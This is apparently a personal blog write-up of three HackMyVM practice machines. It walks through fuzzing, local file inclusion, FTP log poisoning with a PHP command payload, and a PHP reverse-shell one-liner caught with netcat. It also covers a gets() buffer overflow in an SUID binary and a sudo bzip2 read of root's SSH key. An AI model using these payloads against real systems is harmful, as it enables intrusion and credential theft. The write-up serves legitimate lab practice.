HackMyVM: Superhuman, Brain and Eyes
I’ve done a few more HackMyVM boxes: Superhuman, Brain and Eyes. Superhuman and Brain were Easy rated, Eyes is Medium.
Superhuman
This was essentially weaponised guessing, followed by GTFOBins privesc (I think, I didn’t take notes). The only interesting (?) command was this one:
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.10.63/salome_and_FUZZ.zip -fc 403 -ac -v -fw 18Also I guess ciphey was actually useful which tbh was a first for me:
┌──(root💀kali)-[/opt/hackmyvm/brain]
└─# cat ../superhuman/notes-tips.txt
F(&m'D.Oi#De4!--ZgJT@;^00D.P7@8LJ?tF)N1B@:UuC/g+jUD'3nBEb-A+De'u)F!,")@:UuC/g(Km+CoM$DJL@Q+Dbb6ATDi7De:+g@<HBpDImi@/hSb!FDl(?A9)g1CERG3Cb?i%-Z!TAGB.D>AKYYtEZed5E,T<)+CT.u+EM4--Z!TAA7]grEb-A1AM,)s-Z!TADIIBn+DGp?F(&m'D.R'_DId*=59NN?A8c?5F<G@:Dg*f@$:u@WF`VXIDJsV>AoD^&ATT&:D]j+0G%De1F<G"0A0>i6F<G!7B5_^!+D#e>ASuR'Df-\,ARf.kF(HIc+CoD.-ZgJE@<Q3)D09?%+EMXCEa`Tl/c
┌──(root💀kali)-[/opt/hackmyvm/brain]
└─# cat ../superhuman/plaintext
┌──(root💀kali)-[/opt/hackmyvm/superhuman]
└─# ciphey -f notes-tips.txt
Possible plaintext: "salome doesn't want me, I'm so sad... i'm sure god is dead... \nI drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and
she'll desire me. I'll name it salome_and_?? I don't know.\n\nI must not forget to save it and put a good extension because I don't have much storage." (y/N):yBrain
This was an LFI to obtain a password for the foothold and then connecting to an internal service to get another password for the privesc. The only interesting part here was that the file to include was /proc/sched_debug which doesn’t appear in the standard seclists entries for LFI fuzzing. So that was interesting.
GET /brainstorm/file.php?file=/proc/sched_debug HTTP/1.1
┌──(root💀kali)-[/usr/share/seclists/Fuzzing/LFI]
└─# grep -r sched_debug
# crickets chirping
┌──(root💀kali)-[/usr/share/seclists/Fuzzing/LFI]
└─# echo '/proc/sched_debug' >> custom-linux.txtEyes
This was another LFI, but this time we had access to an anonymous FTP server which gave us the LFI parameter straight up so no fuzzing required. No write access to FTP.
┌──(root💀kali)-[/opt/hackmyvm/eyes]
└─# ftp 10.10.10.65
Connected to 10.10.10.65.
220 (vsFTPd 3.0.3)
Name (10.10.10.65:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lash
229 Entering Extended Passive Mode (|||45956|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 113 4096 Apr 04 2021 .
drwxr-xr-x 2 0 113 4096 Apr 04 2021 ..
-rw-r--r-- 1 0 0 125 Apr 04 2021 index.php
226 Directory send OK.
ftp> get index.php
local: index.php remote: index.php
229 Entering Extended Passive Mode (|||45633|)
150 Opening BINARY mode data connection for index.php (125 bytes).
100% |***************************************************************************************************************************| 125 54.03 KiB/s 00:00 ETA
226 Transfer complete.
125 bytes received in 00:00 (45.89 KiB/s)
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||11328|)
550 Permission denied.
ftp>What’s in the file?
┌──(root💀kali)-[/opt/hackmyvm/eyes]
└─# cat index.php
<?php
$file = $_GET['fil3'];
if(isset($file))
{
include($file);
}
else
{
print("Here my eyes...");
}
?>
<!--Monica's eyes-->So we have a username, and anyway we can include /etc/passwd and confirm. Monica doesn’t have an SSH key (spoiler alert) so we can’t read it even if we had permission, which we don’t. We can include /var/log/vsftpd.log so that means we can log poison:
┌──(root💀kali)-[/opt/hackmyvm/eyes]
└─# ftp 10.10.10.65
Connected to 10.10.10.65.
220 (vsFTPd 3.0.3)
Name (10.10.10.65:root): '<?php system($_GET['cmd']);?>'
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.and
GET /index.php?fil3=/var/log/vsftpd.log&cmd=php+-r+'$sock%3dfsockopen("10.10.10.2",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1and
┌──(root💀kali)-[/opt/hackmyvm/eyes]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.65] 43308
/bin/sh: 0: cant access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@eyes:~/html$ ls -lash
ls -lash
total 12K
4.0K drwxr-xr-x 2 root root 4.0K Apr 4 2021 .
4.0K drwxr-xr-x 3 root root 4.0K Apr 4 2021 ..
4.0K -rw-r--r-- 1 root root 125 Apr 4 2021 index.php
www-data@eyes:~/html$Monica
This was the most interesting part here. We have an SUID binary in /opt/ls, along with some C code and a note (the note says something about creating a new version of ls).
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
int main(void)
{
char command[100];
char ls[50]="/usr/bin/ls";
char name[50];
printf("Enter your name:");
gets(name);
strcpy(command,ls);
setuid(1000);
setgid(1000);
printf("Hi %s, Im executing ls\n Output:\n",name);
system(command);
}So here we the ability to overflow:
www-data@eyes:/opt$ ./ls
Enter your name:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaidididididididid
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaidididididididid
Hi aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaidididididididid, Im executing ls
Output:
uid=1000(monica) gid=33(www-data) groups=33(www-data)
www-data@eyes:/opt$So now just change the last ‘id’ to ‘sh’ and get a shell. Privesc is GTFOBins:
User monica may run the following commands on eyes:
(ALL) NOPASSWD: /usr/bin/bzip2This gives us a privileged read, and root has an SSH key:
monica@eyes:/etc$ sudo -u root /usr/bin/bzip2 -c /root/.ssh/id_rsa | bzip2 -d
sudo -u root /usr/bin/bzip2 -c /root/.ssh/id_rsa | bzip2 -d
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAA
# etcSo it’s copy, chmod, login and grab the flag.